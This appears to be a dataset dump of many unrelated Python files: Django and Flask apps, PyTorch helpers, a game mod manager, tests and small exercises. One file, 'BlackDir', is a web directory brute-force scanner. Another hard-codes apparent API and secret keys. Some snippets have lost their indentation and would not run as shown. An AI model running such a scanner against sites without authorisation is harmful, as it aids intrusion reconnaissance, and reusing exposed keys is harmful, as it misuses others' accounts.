text stringlengths 38 1.54M |
|---|
class TestMigrations:
    def test_alembic(self, tmp_path):
        """Round-trip the schema migrations (upgrade then downgrade) on a throwaway SQLite db."""
        from sqlalchemy import create_engine

        from spellbot import get_db_url
        from spellbot.data import create_all, reverse_all

        db_file = tmp_path / "spellbot.db"
        connection_string = f"sqlite:///{db_file}"
        # TEST_SPELLBOT_DB_URL overrides the default tmp-file database if set.
        db_url = get_db_url("TEST_SPELLBOT_DB_URL", connection_string)
        engine = create_engine(db_url)
        connection = engine.connect()
        try:
            create_all(connection, db_url)
            reverse_all(connection, db_url)
        finally:
            # Fix: the connection/engine were previously leaked; always release them.
            connection.close()
            engine.dispose()
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth import logout as logout_user
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import login
from .models import Travel, TravelPlaceKeeper , TravelType
# Create your views here.
def contact(req):
    """Render the static contact page."""
    return render(req, 'myweb/contact.html')
def home(req):
    """Render the site home page."""
    return render(req, 'myweb/home.html')
def admins(req):
    """Render the admin landing page."""
    return render(req, 'myweb/admins.html')
def index(req):
    """Render the index page."""
    return render(req, 'myweb/index.html')
def user(req):
    """Show every Travel and TravelPlaceKeeper record on the user page."""
    showtravel = Travel.objects.all()
    showtravel1 = TravelPlaceKeeper.objects.all()
    return render(req, 'myweb/user.html',{'showtravel':showtravel,'showtravel1':showtravel1})
def logins(req):
    """Render the login page."""
    return render(req, 'myweb/logins.html')
def traveldo(req):
    """Render the travel-booking page."""
    return render(req, 'myweb/traveldo.html')
def sign_up(request):
    """Render the sign-up form; on a valid POST, create the user, log them in, and redirect."""
    form = UserCreationForm(request.POST or None)
    if request.method == "POST" and form.is_valid():
        new_user = form.save()
        login(request, new_user)
        return redirect('logins')
    return render(request, 'myweb/sign_up.html', {'form': form})
|
import sqlite3
from Updater import run_updater

print("\t \t \t \t Update your spendings here _|_ \t \t \t \t")
spendings = {}  # renamed from `dict`, which shadowed the builtin
date = input("Enter the date in YY-mm-dd format : ")  # input() already returns a str
spendings["DATE"] = date
db_loc = r'C:\Users\chand\Documents\P\Projects\Locally_personalised_ads\db\payment_db.db'
table_name_1 = "tab1"
# Getting the last row from the db (only its column names are needed).
command = "SELECT * FROM {} ".format(table_name_1)
command += "ORDER BY ID "
command += "DESC LIMIT 1 ;"
conn = sqlite3.connect(db_loc)
try:
    cursor = conn.execute(command)  # fixed typo: `curser`
    names = [description[0] for description in cursor.description]
finally:
    # Close as soon as the schema is known instead of holding the
    # connection open across the interactive input loop below.
    conn.close()
# First two columns (id, date) are not spending categories.
for col in names[2:]:
    print()
    spendings[col] = float(input("Enter how much did you spend in {} category : ".format(col)))
for col, amount in spendings.items():
    print()
    print("You have entered {} for {}".format(amount, col))
print("\t \t \t \t Updating -|- \t \t \t \t")
run_updater(spendings)
from nltk.corpus import gutenberg, nps_chat
import nltk
# Token-pattern searches over Moby Dick using nltk's angle-bracket regex
# syntax (each <...> matches one token).
moby = nltk.Text(gutenberg.words('melville-moby_dick.txt'))
# "a <any token> man" — e.g. "a monied man".
print(moby.findall(r"<a><.*><man>"))
# Parenthesized group: only the middle token of each match is displayed.
print(moby.findall(r"<a>(<.*>)<man>"))
# Three or more consecutive tokens starting with "l" in the chat corpus.
# NOTE(review): Text.findall prints matches itself and appears to return
# None, so the wrapping print() likely just emits "None" — confirm.
chat = nltk.Text(nps_chat.words())
print(chat.findall(r"<l.*>{3,}"))
# API credentials and storage location for the movimientos app.
# SECURITY NOTE(review): these keys are hard-coded in source control; they
# should be rotated and loaded from environment variables or a secrets store.
# coin_key = "35ad627a-d583-4961-828e-36eead5e8e3b"
coin_key = "9188e46a-558a-4d2c-8496-21c9719ec1d2"
secret_key = "235 h sdblfgghf__aghg9843ty fmsa"
DATABASE = "data/movimientos.db"  # presumably a SQLite database path — confirm
"""
Извлекаем из файла images.json вытащенные из гугл-таблицы
со статистикой урлы-ссылки на эскизы и сохраняем их в базе.
"""
import json
import os
import django
os.environ['DJANGO_SETTINGS_MODULE'] = 'edu_test.settings'
django.setup()
from .models import Student, Task, Image
with open('images.json', 'r') as f:
data = json.load(f)
for task, answers in data.items():
find_task = Task.objects.get(lesson__module__name="Информационные ожидания", number=task)
print(find_task)
for answer in answers:
student, create = Student.objects.get_or_create(email=answer[0][0])
print(student)
for im in answer[1]:
print(im)
image = Image.objects.create(student=student, task=find_task, url=im) |
from flask import Flask, render_template,request
#import flask_mysqldb
#from flask_mysqldb import MySQL
from similar import similar, similar_papers
import pandas as pd
app = Flask(__name__)
# Citation dataset used by /recommend to look up paper titles by row index.
data = pd.read_csv("cite_updated.csv")
@app.route("/")
def home():
    """Landing page with the search form."""
    return render_template("home.html")
@app.route('/results', methods=['POST', 'GET'])
def result():
    """Search for papers matching the submitted keyword and render them."""
    if request.method == 'POST':
        keyword = request.form['keyword'].lower()
        index, result, author = similar(keyword)
        return render_template("results.html", keyword=keyword, result=result, index=index, author=author)
    # Fix: a GET request previously fell through and returned None,
    # which Flask turns into a 500 error; show the search form instead.
    return render_template("home.html")
@app.route('/recommend',methods = ['POST', 'GET'])
def recommend():
    """Recommend papers similar to the one selected by row index."""
    # `index` is the row number of the selected paper in cite_updated.csv.
    # NOTE(review): int(index) raises if the query param is missing or
    # non-numeric — confirm callers always supply it.
    index = request.args.get('index')
    title = data.loc[int(index)].title
    recommended,titles,authors = similar_papers(title)
    print(title,recommended)
    return render_template("results.html",keyword = title ,result = titles, index = recommended,author = authors)
if __name__ == "__main__":
app.run(debug=True)
app.static_folder = 'static'
|
str = "a b\t c \nd"
print(str)
list = str.split()
print(list)
result = "\n".join(list)
print(result)
|
import torch
import torchvision
import numpy as np
import matplotlib.pyplot as plt
import os
def batch_transform(batch, transform):
    """Apply *transform* to every sample of a batch tensor.

    Args:
        batch: tensor whose first dimension indexes samples.
        transform (callable): function/transform applied to each sample.

    Returns:
        A tensor of the transformed samples re-stacked along dim 0.
    """
    # unbind splits the batch along dim 0; transform each slice, then restack.
    return torch.stack([transform(sample) for sample in torch.unbind(batch)])
def imshow_batch(images, labels):
    """Display two image grids: "images" on top and "labels" below.

    Args:
        images ("Tensor"): a 4D mini-batch tensor of shape (B, C, H, W)
        labels ("Tensor"): a 4D mini-batch tensor of shape (B, C, H, W)
    """
    # Tile each mini-batch into a single grid image and convert to numpy.
    images = torchvision.utils.make_grid(images).numpy()
    labels = torchvision.utils.make_grid(labels).numpy()
    fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(15, 7))
    # make_grid returns (C, H, W); imshow expects (H, W, C).
    ax1.imshow(np.transpose(images, (1, 2, 0)))
    ax2.imshow(np.transpose(labels, (1, 2, 0)))
    plt.show()
def save_checkpoint(model, optimizer, epoch, miou, args):
    """Save a training checkpoint plus a text summary of the run arguments.

    Args:
        model ("nn.Module"): model whose weights are saved.
        optimizer ("torch.optim"): optimizer whose state is saved.
        epoch ("int"): current epoch number.
        miou ("float"): mean IoU achieved by the model.
        args ("ArgumentParser"): run configuration; must provide `name` and
            `save_dir`. All arguments are also written to
            "<name>_summary.txt" inside `save_dir`.
    """
    name = args.name
    save_dir = args.save_dir
    assert os.path.isdir(
        save_dir), "The directory \"{0}\" doesn't exist.".format(save_dir)
    # Bundle weights, optimizer state, and progress into one checkpoint file.
    checkpoint = {
        'epoch': epoch,
        'miou': miou,
        'state_dict': model.state_dict(),
        'optimizer': optimizer.state_dict()
    }
    torch.save(checkpoint, os.path.join(save_dir, name))
    # Write a human-readable summary of every run argument plus the
    # best-validation numbers.
    summary_filename = os.path.join(save_dir, name + '_summary.txt')
    with open(summary_filename, 'w') as summary_file:
        summary_file.write("ARGUMENTS\n")
        for arg in sorted(vars(args)):
            summary_file.write("{0}: {1}\n".format(arg, getattr(args, arg)))
        summary_file.write("\nBEST VALIDATION\n")
        summary_file.write("Epoch: {0}\n".format(epoch))
        summary_file.write("Mean IoU: {0}\n".format(miou))
def load_checkpoint(model, optimizer, folder_dir, filename):
    """Load a checkpoint saved by save_checkpoint into *model* and *optimizer*.

    Args:
        model ("nn.Module"): instance that receives the stored weights.
        optimizer ("torch.optim"): instance that receives the stored state.
        folder_dir ("string"): directory containing the saved model state.
        filename ("string"): checkpoint file name inside folder_dir.

    Returns:
        The restored (model, optimizer, epoch, mean IoU) tuple.
    """
    assert os.path.isdir(
        folder_dir), "The directory \"{0}\" doesn't exist.".format(folder_dir)
    model_path = os.path.join(folder_dir, filename)
    assert os.path.isfile(
        model_path), "The model file \"{0}\" doesn't exist.".format(filename)
    print("加载已经存储的模型")
    # Copy the stored parameters into the supplied instances in place.
    checkpoint = torch.load(model_path)
    model.load_state_dict(checkpoint['state_dict'])
    optimizer.load_state_dict(checkpoint['optimizer'])
    return model, optimizer, checkpoint['epoch'], checkpoint['miou']
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
# URLs resolved from the "user" app's named routes.
RESTAURANT_URL = reverse("user:restaurant")
CREATE_RESTAURANT_URL = reverse("user:createrestaurant")
def create_user(**params):
    """Create and return a user via the project's configured user model."""
    return get_user_model().objects.create_user(**params)
class PublicRestaurantTests(TestCase):
    """Tests for the restaurant endpoints without authentication.

    Uses the default Django test client (self.client) provided by TestCase.
    """
    def test_retrieve_restaurant_unauthorized(self):
        """Test that authentication is required for users"""
        res = self.client.get(RESTAURANT_URL)
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
    def test_create_valid_restaurant_success(self):
        """Test creating restaurant with valid payload is successful"""
        payload = {
            "email": "test@gmail.com",
            "password": "testpass",
            "name": "Test Name"
        }
        res = self.client.post(CREATE_RESTAURANT_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        # Look the user up by the returned fields; password must not be echoed.
        user = get_user_model().objects.get(**res.data)
        self.assertTrue(user.check_password(payload["password"]))
        self.assertNotIn("password", res.data)
    def test_restaurant_exists(self):
        """Test restaurant already exists fail"""
        payload = {"email": "test@gmail.com", "password": "testpass"}
        create_user(**payload)
        res = self.client.post(CREATE_RESTAURANT_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
    def test_password_too_short(self):
        """Test that the password must be more than 5 characters"""
        payload = {"email": "test@gmail.com", "password": "pw"}
        res = self.client.post(CREATE_RESTAURANT_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        # The rejected signup must not have created a user.
        user_exists = get_user_model().objects.filter(
            email=payload["email"]
        ).exists()
        self.assertFalse(user_exists)
    def test_non_restaurant_can_not_see_page(self):
        """Test that not restaurant can't see the restaurant page"""
        # Authenticated but without the restaurant flag -> forbidden.
        self.user = create_user(
            email="test@gmail.com",
            password="testpass",
            name="name",
        )
        self.client = APIClient()
        self.client.force_authenticate(user=self.user)
        res = self.client.get(RESTAURANT_URL)
        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
class PrivateEmployeeTests(TestCase):
    """Tests for restaurant users"""
    def setUp(self):
        # Every test runs as an authenticated user with is_restaurant=True.
        self.user = create_user(
            email="test@gmail.com",
            password="testpass",
            name="name",
            is_restaurant=True
        )
        self.client = APIClient()
        self.client.force_authenticate(user=self.user)
    def test_retrieve_profile_success(self):
        """test retrieving profile for logged in restaurant"""
        res = self.client.get(RESTAURANT_URL)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, {
            "name": self.user.name,
            "email": self.user.email,
            "is_employee": self.user.is_employee,
            "is_restaurant": self.user.is_restaurant,
        })
    def test_post_me_not_allowed(self):
        """Test that post is not allowed on the restaurant url"""
        res = self.client.post(RESTAURANT_URL, {})
        self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
    def test_update_user_profile(self):
        """Test updating the restaurant profile for authenticated restaurant"""
        payload = {"name": "new name", "password": "newpassword213"}
        res = self.client.patch(RESTAURANT_URL, payload)
        # Reload from the DB to see the persisted changes.
        self.user.refresh_from_db()
        self.assertEqual(self.user.name, payload["name"])
        self.assertTrue(self.user.check_password(payload["password"]))
        self.assertEqual(res.status_code, status.HTTP_200_OK)
|
import requests
import argparse
import threading
def logo():
    """Print the BlackDir banner and usage examples (ANSI green)."""
    print("""
    \x1b[32m
     ____  _            _    ____  _
    | __ )| | __ _  ___| | _| _ \(_)_ __
    |  _ \| |/ _` |/ __| |/ / | | | | '__|
    | |_) | | (_| | (__|   <| |_| | | |
    |____/|_|\__,_|\___|_|\_\____/|_|_|   version:0.2
    ==================================================
    C0ded By RedVirus[@redvirus0]
    Group:BlackPearl[@bp.team]
    Site:blackpearl.team
    ==================================================
    BlackDir.py --url : url to find Directory
    BlackDir.py --list : if you have list
    ex:
    BlackDir.py --list /root/Desktop/list.txt --url http://google.com
    """)
def Dir(url, wordlist):
    """Probe url/<word> for each word in *wordlist* and report HTTP 200 hits.

    Args:
        url: base URL without a trailing slash.
        wordlist: iterable of candidate path names (lines are stripped).
    """
    # Renamed the `list` parameter, which shadowed the builtin; callers pass
    # it positionally so the interface is unchanged.
    for word in wordlist:
        word = word.strip()
        probe_url = url + "/" + word
        response = requests.get(probe_url, data=None)
        if response.status_code == 200:
            print("\x1b[32mFound[+]")
            print(probe_url)
parser = argparse.ArgumentParser("Find Directory")
parser.add_argument("-url","--url")
parser.add_argument("-list","--list")
args = parser.parse_args()
listuser = args.list
if listuser != None:
lists = open(listuser,"r")
else:
lists = open("list.txt","r")
url = args.url
thred = threading.Thread(target=Dir,args=(url,lists))
if args.url == None:
logo()
else:
print("\x1b[32mPlease wait we find Directory .. ")
thred.start()
|
from bref_feature_engineering.rollingavg_seasonlog_teamrecord import teamrecord
from bref_feature_engineering.proportion_ip_available import get_games_played, append_proportion_ip_avail
# Build the 2017 Boston Celtics season record, append the proportion of
# injured-player availability, and print the result.
celtics_17 = teamrecord("Boston Celtics", 2017)
append_proportion_ip_avail(celtics_17, "Boston Celtics")
print(celtics_17)
import os
import sys
import struct
import collections
import argparse
from os.path import exists, join, relpath, isdir
from contextlib import contextmanager
from typing import Tuple, List
from . import mod
from . import uassetz
MOD_APPID = "346110"
DEFAULT_MOD_STORAGE_DIR = "steamapps/workshop/content/" + MOD_APPID
# Modids here should be ignored by "install"/"remove".
# This overrides mod name if set when calling "list".
OVERRIDE_MODIDS = {
"111111111": "Primitive+ (official)" # This is a special flower.
}
# Helper functions ###########################################################
@contextmanager
def ctxchdir(path):
    """Temporarily chdir into *path*, restoring the previous cwd on exit."""
    previous = os.getcwd()
    try:
        # os.chdir returns None, so the value bound by `as` is None too.
        yield os.chdir(path)
    finally:
        os.chdir(previous)
def ark_platform() -> str:
    """Guess the game's platform from which binary directories exist.

    Linux wins whenever a Linux build is present; otherwise Win64 or Mac.
    Assumes the cwd is the ark root (modtool chdirs there first).
    """
    things = os.listdir("ShooterGame/Binaries")
    if "Win64" in things and "Linux" not in things:
        return "Win64"
    elif "Mac" in things and "Linux" not in things:
        return "Mac"
    return "Linux"
def is_dedicated() -> bool:
    """Return True when only the dedicated-server executable is present."""
    # check for the existance of the server executable,
    # and the absence of the client executable.
    plat = ark_platform()
    if plat.startswith("Win"):
        ext = ".exe"
    else:
        ext = ""
    sv_exec = exists("ShooterGame/Binaries/" + plat + "/ShooterGameServer" + ext)
    cl_exec = exists("ShooterGame/Binaries/" + plat + "/ShooterGame" + ext)
    return sv_exec and not cl_exec
def rm(filep, verbose=False):
    """Remove the file at *filep*; when *verbose* is true, log the removal first."""
    if verbose:
        print("removing '%s'" % (filep))
    os.unlink(filep)
def recrm(direc, verbose=False):
    """Recursively delete *direc* and everything below it.

    Walks bottom-up so each directory is already empty when it is removed.
    """
    for dirpath, dirnames, filenames in os.walk(direc, topdown=False, followlinks=False):
        for dirname in dirnames:
            dirname = join(dirpath, dirname)
            if verbose:
                # Fix: this previously printed `filename`, which is undefined
                # (or stale) at this point and raised a NameError when verbose.
                print("removing '%s'" % dirname)
            os.rmdir(dirname)
        for filename in filenames:
            filename = join(dirpath, filename)
            if verbose:
                print("removing '%s'" % filename)
            os.unlink(filename)
    if verbose:
        print("removing '%s'" % direc)
    os.rmdir(direc)
#################
# CLI functions #
#################
def modtool(args):
    """Top-level CLI dispatcher: normalize paths and platform, run the subcommand."""
    # Make storage dir relative to ark root
    args.mod_storage_dir = relpath(args.mod_storage_dir, args.ark_root)
    # Change to ark root dir.
    os.chdir(args.ark_root)
    # Resolve mod_platform
    # Note: ark dedicated servers seem to need the Windows versions of mod files.
    if args.mod_platform is None:
        platform = ark_platform()
        if platform == "Linux" and not is_dedicated():
            args.mod_platform = "LinuxNoEditor"
        elif platform == "Mac" and not is_dedicated():
            # Fix: this branch previously called `is_dediated()` (typo) and
            # raised a NameError on Mac clients.
            args.mod_platform = "MacNoEditor"  # XXX: Pure guess.
        else:
            args.mod_platform = "WindowsNoEditor"
    return args.mod_func(args)
# Mod installation ###########################################################
def do_mod_install(modid: str, mod_storage_dir: str, mod_platform: str):
    """Install one mod from workshop storage into the game's mod directory.

    Copies the platform-specific tree, decompressing ".uasset.z" files on the
    way, then generates the ".mod" descriptor file the game expects.
    """
    storage_path = join(mod_storage_dir, modid, mod_platform)
    install_path = join(mod.MOD_LOCATION, modid)
    if exists(install_path + ".mod"):
        print("mod {0} already installed.".format(modid))
        return
    os.mkdir(install_path)
    for sdir_path, dirnames, filenames in os.walk(
        storage_path,
        followlinks=True
    ):
        # Mirror the storage tree below the install dir.
        idir_path = join(install_path, relpath(sdir_path, storage_path))
        for dirname in dirnames:
            os.mkdir(join(idir_path, dirname))
        for filename in filenames:
            # Size-hint files only accompany the compressed originals; skip.
            if filename.endswith(".uasset.z.uncompressed_size"):
                continue
            # Strip the two-char ".z" suffix from compressed asset names.
            slcidx = -2 if filename.endswith(".uasset.z") else None
            srcpath = join(sdir_path, filename)
            dstpath = join(idir_path, filename[:slcidx])
            with open(srcpath, "rb") as src, open(dstpath, "wb") as dst:
                if filename.endswith(".uasset.z"):
                    uassetz.decompress(src, dst)
                else:
                    dst.write(src.read())
    # Combine mod.info (+ optional modmeta.info) into the ".mod" descriptor.
    mip = join(install_path, "mod.info")
    with open(mip, "rb") as mif:
        mi = mif.read()
    mmip = join(install_path, "modmeta.info")
    if exists(mmip):
        with open(mmip, "rb") as mmif:
            mmi = mmif.read()
    else:
        mmi = None
    mf = mod.ark_gen_modfile(modid, mi, mmi)
    with open(install_path + ".mod", "wb") as modf:
        modf.write(mf)
    print("installed {0}".format(modid))
def mod_install(args):
    """CLI: install each requested modid from storage; special ids are skipped."""
    if len(args.modid) == 0:
        print("no modids specified!")
        return 1
    for modid in args.modid:
        if modid in OVERRIDE_MODIDS:
            print("ignoring special modid %s" % modid)
            continue
        do_mod_install(modid, args.mod_storage_dir, args.mod_platform)
    # Consistency fix: mirror mod_remove/mod_upgrade by returning an exit code.
    return 0
# Mod removal ################################################################
def do_mod_remove(modid: str):
    """Delete an installed mod: its ".mod" descriptor and its directory tree."""
    installed = join(mod.MOD_LOCATION, modid)
    if os.path.exists(installed + ".mod"):
        rm(installed + ".mod")
    if os.path.isdir(installed):
        recrm(installed)
def mod_remove(args):
    """CLI: remove each requested modid; special override ids are skipped."""
    if not args.modid:
        print("no modids specified!")
        return 1
    for modid in args.modid:
        if modid in OVERRIDE_MODIDS:
            print("ignoring special modid %s" % modid)
        else:
            do_mod_remove(modid)
    return 0
# Mod upgrading ##############################################################
def mod_chsuffix(modid: str, cursfx: str="", tarsfx: str=""):
    """Rename a mod's ".mod" file and directory from one suffix to another.

    Used to move an install aside (e.g. to ".bak") during upgrades.
    """
    with ctxchdir(mod.MOD_LOCATION):
        if exists(modid + ".mod" + cursfx):
            os.rename(modid + ".mod" + cursfx, modid + ".mod" + tarsfx)
        os.rename(modid + cursfx, modid + tarsfx)
def do_mod_upgrade(modid: str, mod_storage_dir: str, mod_platform: str):
    """Upgrade one mod: back up the current install as ".bak", then reinstall."""
    print("renaming old mod files...")
    mod_chsuffix(modid, tarsfx=".bak")
    print("installing mod...")
    do_mod_install(modid, mod_storage_dir, mod_platform)
def mod_upgrade(args):
    """CLI: upgrade each requested modid; special override ids are skipped."""
    if not args.modid:
        print("no modids specified!")
        return 1
    for modid in args.modid:
        if modid in OVERRIDE_MODIDS:
            print("ignoring special modid %s" % modid)
        else:
            do_mod_upgrade(modid, args.mod_storage_dir, args.mod_platform)
    return 0
# Mod listing ################################################################
def mod_list(args):
    """CLI: print a table of mods found in storage ("s") and/or installed ("i")."""
    class ModEntry:
        # Where a given modid was found; either location may be None.
        __slots__ = ["storage_dir", "install_dir"]
        def __init__(self):
            self.storage_dir = None
            self.install_dir = None
    def modinfo_strings(path: str, statsym: str):
        """Return (status symbol, mod name) for a mod dir; "!" on read error."""
        if path is None:
            return " ", None
        try:
            with open(join(path, "mod.info"), "rb") as mif:
                mi = mod.ark_unpack_mod_info(mif.read())
            return statsym, mi.mod_name.decode("utf8")
        except (IOError, struct.error) as err:
            print("error: " + str(err), file=sys.stderr)
            return "!", None
    mods = collections.defaultdict(ModEntry)
    # Collect mods present in workshop storage (numeric dirs only).
    if isdir(args.mod_storage_dir):
        for modid in os.listdir(args.mod_storage_dir):
            if not modid.isnumeric():
                continue
            if len(args.modid) > 0 and modid not in args.modid:
                continue
            sdir = join(args.mod_storage_dir, modid)
            if len(os.listdir(sdir)) == 0:
                continue
            mods[modid].storage_dir = sdir
    # Collect mods actually installed in the game directory.
    if isdir(mod.MOD_LOCATION):
        for modid in os.listdir(mod.MOD_LOCATION):
            if not modid.isnumeric():
                continue
            if len(args.modid) > 0 and modid not in args.modid:
                continue
            mods[modid].install_dir = join(mod.MOD_LOCATION, modid)
    modids = sorted(mods.keys(), key=int)
    if len(modids) < 1:
        print("no mods to show.")
        return 0
    # Pad ids to the width of the numerically largest (last after sort) id.
    padding = len(modids[-1])
    for modid in modids:
        ent = mods[modid]
        # output format: [di] <modid> name (downloded, installed)
        sq, sname = modinfo_strings(ent.storage_dir, "s")
        iq, iname = modinfo_strings(ent.install_dir, "i")
        # name printing logic:
        # OVERRIDE_MODIDS? -> use that one.
        # both none? -> "(unknown)"
        # one none? -> the one that isn't.
        # both not none?
        #   are they equal? -> no choice needed.
        #   else, if not? -> display both
        if modid in OVERRIDE_MODIDS:
            modname = OVERRIDE_MODIDS[modid]
        elif sname is None or iname is None:
            modname = sname or iname or "(unknown)"
        elif sname == iname:
            modname = iname
        else:
            modname = "installed: {0}, stored: {1}.".format(iname, sname)
        print("[{s}{i}] {mi: >{pad}} {mn}".format(
            pad=padding,
            s=sq,
            i=iq,
            mi=modid,
            mn=modname
        ))
    return 0
def tool_argparse(parser):
    """Attach the mod-tool options and subcommands to *parser*."""
    parser.add_argument("-r", "--ark-root", dest="ark_root", action="store", default="./")
    parser.add_argument("-m", "--mod-storage", dest="mod_storage_dir", action="store", default=DEFAULT_MOD_STORAGE_DIR)
    parser.add_argument("-p", "--mod-platform", dest="mod_platform", action="store", choices={"LinuxNoEditor", "WindowsNoEditor"}, default=None)
    parser.set_defaults(func=modtool, mod_func=mod_list, modid=[])
    subparsers = parser.add_subparsers()
    # (command, aliases, handler) — every subcommand takes zero or more modids.
    for cmd, aliases, handler in (
        ("list", ["ls"], mod_list),
        ("install", ["ins"], mod_install),
        ("remove", ["rm"], mod_remove),
        ("upgrade", ["up"], mod_upgrade),
    ):
        sub = subparsers.add_parser(cmd, aliases=aliases)
        sub.add_argument(dest="modid", action="store", nargs="*")
        sub.set_defaults(mod_func=handler)
def main():
    """Build the CLI parser, parse argv, and run the selected command."""
    parser = argparse.ArgumentParser()
    tool_argparse(parser)
    args = parser.parse_args()
    # `func` is always modtool; it dispatches to the chosen mod_func.
    return args.func(args)
if __name__ == "__main__":
    sys.exit(main())
|
from GeneralPythonCopy.General import General
'''
Process for User uploading data:
1. User: uploads files to Website and chooses the y_variable for the regression (discrete occurrence) [views.py]
2. Backend: uploaded files go to uploaded_files along with a txt file with the specified y_variable which is accessible to the Web App py files [views.py]
3. Backend: performs gp_symbolic_regression on the information uploaded (discrete occurrence) [views.py]
4. Backend: uploads equation results to equations database (discrete occurrence) [views.py]
5. Backend: creates complete structures out of the equations database whenever the database is updated (discrete occurrence) [views.py]
6. Backend: for each key in the complete_structures resultant dictionary:
static_causal_order(5) (discrete occurrence)
9. Backend: initialize_mini_network(5, 7, name)
if the name (of the network) already exists, modify_mini_network(5, 7, prev_network gexf graph, name) (discrete occurrence)
10. Backend: build_causal_network() (discrete occurrence)
11. Backend: when the AI is finished using the User's uploaded files, the AI deletes the files from the uploaded_files directory
Process for User performing a simulation
1. User: chooses equation name from menu; chooses variable from selected equation; inputs variable values of the equation; selects target variable from menu (discrete occurrence)
2. Backend:
Process for User performing an optimization
1. User: chooses an equation name from menu; chooses variable from selected equation; chooses objective to min or max; inputs constraints; inputs variable bounds;
inputs initial condition (discrete occurrence)
2. Backend:
'''
import numpy # we import the array library
from matplotlib import pyplot # import plotting library
# Basic NumPy / Python warm-up examples.
myarray = numpy.linspace(4, 5, 2)  # two evenly spaced points: [4.0, 5.0]
print(myarray)

a = 5        # an integer 5
b = 'five'   # a string of the word 'five'
c = 5.0      # a floating point 5
for value in (a, b, c):
    print(type(value))

# The loop body runs once per character of the string.
for i in 'abcd':
    print("Hi \n")

# Nested loops: the outer print runs once per value of i.
for i in range(3):
    for j in range(3):
        print(i, j)
    print("This statement is within the i-loop, but not the j-loop")

myvals = numpy.array([1, 2, 3, 4, 5])
print(myvals)
print(myvals[0], myvals[4])
from app_instance import app
from umongo import Document
from umongo.fields import StringField, IntegerField, ListField
@app.lazy_umongo.register
class Movies(Document):
    """MongoDB document describing a movie record."""
    name = StringField(required=True, allow_none=False)
    popularity = IntegerField()
    director = StringField(required=True, allow_none=False)
    # One StringField entry per genre tag.
    genre = ListField(StringField(required=True, allow_none=False))
    imdb_score = IntegerField()
    movie_id = StringField(required=True, allow_none=False)
    insert_datetime = StringField(required=True, allow_none=False)
    # allow_none=True: documents that were never updated keep None here.
    update_datetime = StringField(required=True, allow_none=True)
    def pre_delete(self):
        # Lifecycle hook invoked before a document is deleted.
        print("Pre delete called")
@app.lazy_umongo.register
class Users(Document):
    """Application user with a single role string."""
    username = StringField(required=True, allow_none=False)
    password = StringField(required=True, allow_none=False)
    role = StringField(required=True, allow_none=False)
|
#!/usr/bin/env python
#--------Include modules---------------
from copy import copy
import rospy
from visualization_msgs.msg import Marker
from std_msgs.msg import String
from geometry_msgs.msg import Point
from nav_msgs.msg import OccupancyGrid
from os import system
from random import random
from numpy import array
from numpy import concatenate
from numpy import vstack
from numpy import delete
from numpy import linalg as LA
from functions import Nearest
from functions import Steer
from functions import Near
import parameters as param
from functions import ObstacleFree
from functions import Find
from functions import Cost
from functions import prepEdges
from numpy import all as All
def callback(data):
    """Log every message received on the subscribed topic."""
    rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
def node():
    """Minimal ROS node: subscribe to the map occupancy grid and spin."""
    # Fix: rospy.init_node must be called before creating any Subscriber,
    # otherwise rospy raises "client code must call rospy.init_node() first".
    rospy.init_node('testNode', anonymous=False)
    rospy.Subscriber("map", OccupancyGrid, callback)
    rate = rospy.Rate(1)
    #-------------------------------RRT------------------------------------------
    while not rospy.is_shutdown():
        rate.sleep()
#_____________________________________________________________________________
if __name__ == '__main__':
    try:
        node()
    except rospy.ROSInterruptException:
        # Raised on Ctrl-C / node shutdown while sleeping — exit quietly.
        pass
|
import random
from ac_flask.hipchat import Addon, room_client, addon_client, sender, context
from ac_flask.hipchat.glance import Glance
from flask import Flask
# HipChat add-on demo: a configure page, two webhooks, a glance, and a web panel.
addon = Addon(app=Flask(__name__),
    key="test-addon",
    name="Test AddOn",
    allow_room=True,
    scopes=['send_notification', 'view_room'])
@addon.configure_page()
def configure():
    """Minimal configuration page shown after installation."""
    return "hi"
@addon.webhook(event="room_enter")
def room_entered():
    """Greet whoever enters the room by their sender id."""
    room_client.send_notification('hi: %s' % sender.id)
    return '', 204
@addon.webhook(event='room_message', pattern='^/update')
def room_message():
    """On "/update" messages, refresh the glance with a new random count."""
    label = 'Update count: {}'.format(random.randint(1, 100))
    glance_data = Glance().with_label(label).with_lozenge('progress', 'current').data
    addon_client.update_room_glance('glance.key', glance_data, context['room_id'])
    return '', 204
@addon.glance(key='glance.key', name='Glance', target='webpanel.key', icon='static/glance.png')
def glance():
    """Initial glance content: a random count with a progress lozenge."""
    label = 'Update count: {}'.format(random.randint(1, 100))
    return Glance().with_label(label).with_lozenge('progress', 'current').data
@addon.webpanel(key='webpanel.key', name='Panel')
def web_panel():
    """Side panel opened when the glance is clicked."""
    return "This is a panel"
if __name__ == '__main__':
    addon.run(host="0.0.0.0")
# Copyright 2022 The HuggingFace Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from stable_baselines3 import PPO
import simulate as sm
from simulate.assets.action_mapping import ActionMapping
# This example adds an impressive recreation of the mountain car Gym environment
def add_rl_components_to_scene(scene):
    """Wire up the actor, actions, reward, and state sensor for the MountainCar scene."""
    actor = scene.Cart
    actor.is_actor = True
    # Add action mappings, moving left and right
    mapping = [
        ActionMapping("add_force", axis=[1, 0, 0], amplitude=300),
        ActionMapping("add_force", axis=[-1, 0, 0], amplitude=300),
    ]
    actor.actuator = sm.Actuator(mapping=mapping, n=2)
    # Add rewards, reaching the top of the right hill
